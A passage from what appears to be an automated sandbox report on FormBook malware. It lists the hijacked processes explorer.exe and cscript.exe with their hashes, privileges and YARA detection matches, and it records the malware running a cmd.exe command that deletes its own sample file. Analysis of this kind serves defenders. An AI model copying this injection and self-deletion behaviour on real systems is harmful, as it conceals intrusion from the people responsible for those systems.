• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 14:36:57
Start date: 27/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 14:37:21
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cscript.exe
Imagebase: 0x1c0000
File size: 143360 bytes
MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 14:37:25
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:37:26
Start date: 27/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis
